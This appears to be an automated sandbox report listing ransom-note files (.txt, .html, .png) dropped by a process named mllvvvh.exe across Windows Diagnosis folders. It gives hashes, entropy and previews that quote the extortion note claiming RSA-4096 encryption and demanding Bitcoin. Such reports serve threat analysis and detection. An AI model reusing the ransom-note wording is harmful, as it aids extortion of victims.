                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\EventTranscript\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\EventTranscript\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\EventTranscript\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\OfflineSettings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\OfflineSettings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\OfflineSettings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\Scripts\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\Scripts\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\Scripts\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\Sideload\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\Sideload\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\Sideload\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\Siufloc\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:modified
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\Siufloc\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\Siufloc\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
